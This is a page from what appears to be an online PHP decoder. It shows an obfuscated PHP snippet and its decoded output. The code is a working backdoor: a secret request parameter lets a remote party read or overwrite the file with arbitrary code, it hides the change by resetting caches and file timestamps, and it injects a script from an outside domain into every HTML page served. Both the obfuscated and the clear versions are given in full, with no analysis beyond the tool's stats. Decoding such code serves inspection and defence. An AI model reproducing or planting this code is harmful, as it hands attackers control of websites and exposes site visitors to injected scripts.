Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if(isset($_REQUEST["vav\x70\x65\x35\x33\x61\x62\165\156\155\x6a\60\x63\x38"])){ if(em..
Decoded Output download
<? if(isset($_REQUEST["vavpe53abunmj0c8"])){
if(empty($_REQUEST["vavpe53abunmj0c8"])){
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
}else{
header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$kw3z2m=filemtime(__FILE__);$pf6rme=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["vavpe53abunmj0c8"]))));@touch(__FILE__,$kw3z2m+1,$pf6rme+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function pmjikt($kw3z2m){return str_replace("</head>","<script type='text/javascript' async src='https://6qmev3fs.cloudfire.quest/challenge.js'></script></head>",$kw3z2m);
}
ob_start("pmjikt");
} ?>
Did this file decode correctly?
Original Code
if(isset($_REQUEST["vav\x70\x65\x35\x33\x61\x62\165\156\155\x6a\60\x63\x38"])){
if(empty($_REQUEST["\x76\141\x76pe\x35\63\x61\x62\x75\156\x6d\152\x30\1438"])){
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
}else{
header("X-\x4cit\x65S\x70e\x65\144\55\x50u\162\147\145\x3a \52");if(function_exists("o\160\x63\x61\x63\150\145\x5fr\x65se\164")){@opcache_reset();}if(function_exists("\x61\x70\x63_\x63l\145\x61\162\x5f\x63\141\143\150\145")){@apc_clear_cache();}$kw3z2m=filemtime(__FILE__);$pf6rme=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("\x48\x2a",$_REQUEST["\x76a\166p\x65\x353ab\165\156mj\60\143\x38"]))));@touch(__FILE__,$kw3z2m+1,$pf6rme+1);}die;}if(isset($_SERVER["\x48\x54\124\120\x5fA\103C\105\120\x54"])&&(strpos($_SERVER["\x48\124\124P_A\x43C\x45P\x54"],"\x74\145xt/\x68\164m\x6c")!==false||$_SERVER["\110\x54\x54\x50_\101\103C\x45\120\124"]==="*/\52")){function pmjikt($kw3z2m){return str_replace("<\57h\145a\144\x3e","<\163\143\x72\x69\x70t \x74\x79p\x65\75\x27\164\x65x\x74\57\152\x61\x76\141s\x63\162\151p\164\47\40as\x79\x6e\143\40s\162c=\x27h\164\164\x70\163\72\x2f\57\66\161m\145\166\63\146\x73\x2e\143\154\157u\x64f\x69re.\x71ue\x73\x74\57\143\x68\x61\154\x6c\145n\x67\x65.j\163'\x3e\x3c\x2f\163\x63\162i\x70\x74\x3e\x3c/he\141\144\x3e",$kw3z2m);
}
ob_start("\x70\x6d\152\x69\x6b\x74");
}
Function Calls
strpos | 1 |
Stats
MD5 | 721a066cbc9a8ab58d59d062cf6880e9 |
Eval Count | 0 |
Decode Time | 74 ms |